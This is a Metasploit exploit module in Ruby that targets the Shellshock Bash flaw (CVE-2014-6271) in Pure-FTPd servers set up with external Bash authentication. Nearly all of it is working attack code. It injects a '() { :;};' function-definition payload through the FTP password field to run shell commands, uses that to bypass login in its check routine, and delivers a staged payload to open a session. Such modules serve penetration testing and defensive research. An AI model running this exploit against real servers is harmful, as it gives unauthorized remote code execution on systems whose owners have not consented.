1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::CmdStager
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)',
17
        'Description' => %q{
18
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
19
          handles external environment variables. This module targets the Pure-FTPd FTP
20
          server when it has been compiled with the --with-extauth flag and an external
21
          Bash script is used for authentication. If the server is not set up this way,
22
          the exploit will fail, even if the version of Bash in use is vulnerable.
23
        },
24
        'Author' => [
25
          'Stephane Chazelas', # Vulnerability discovery
26
          'Frank Denis', # Discovery of Pure-FTPd attack vector
27
          'Spencer McIntyre' # Metasploit module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2014-6271' ],
31
          [ 'CWE', '94' ],
32
          [ 'OSVDB', '112004' ],
33
          [ 'EDB', '34765' ],
34
          [ 'URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc' ],
35
          [ 'URL', 'http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules' ]
36
        ],
37
        'Payload' => {
38
          'DisableNops' => true,
39
          'Space' => 2048
40
        },
41
        'Targets' => [
42
          [
43
            'Linux x86',
44
            {
45
              'Platform' => 'linux',
46
              'Arch' => ARCH_X86,
47
              'CmdStagerFlavor' => :printf
48
            }
49
          ],
50
          [
51
            'Linux x86_64',
52
            {
53
              'Platform' => 'linux',
54
              'Arch' => ARCH_X64,
55
              'CmdStagerFlavor' => :printf
56
            }
57
          ]
58
        ],
59
        'DefaultOptions' => {
60
          'PrependFork' => true
61
        },
62
        'DefaultTarget' => 0,
63
        'DisclosureDate' => '2014-09-24',
64
        'Notes' => {
65
          'AKA' => [ 'Shellshock' ],
66
          'Stability' => [ CRASH_SAFE, ],
67
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
68
          'Reliability' => [ REPEATABLE_SESSION, ],
69
        }
70
      )
71
    )
72
    register_options(
73
      [
74
        Opt::RPORT(21),
75
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
76
      ]
77
    )
78
    deregister_options('FTPUSER', 'FTPPASS')
79
  end
80

81
  def check
82
    # this check method tries to use the vulnerability to bypass the login
83
    username = rand_text_alphanumeric(rand(20) + 1)
84
    random_id = (rand(100) + 1)
85
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
86
    if send_command(username, command) =~ /^2\d\d ok./i
87
      disconnect
88
      return CheckCode::Safe if banner !~ /pure-ftpd/i
89

90
      command = "echo auth_ok:0; echo end"
91
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
92
        disconnect
93
        return CheckCode::Vulnerable
94
      end
95
    end
96
    disconnect
97

98
    CheckCode::Safe
99
  end
100

101
  def execute_command(cmd, _opts)
102
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
103
    username = rand_text_alphanumeric(rand(20) + 1)
104
    send_command(username, cmd)
105
  end
106

107
  def exploit
108
    execute_cmdstager(linemax: 500)
109
    handler
110
  end
111

112
  def send_command(username, cmd)
113
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
114
    connect
115
    send_user(username)
116
    password_result = send_pass(cmd)
117
    disconnect
118
    password_result
119
  end
120
end
121

122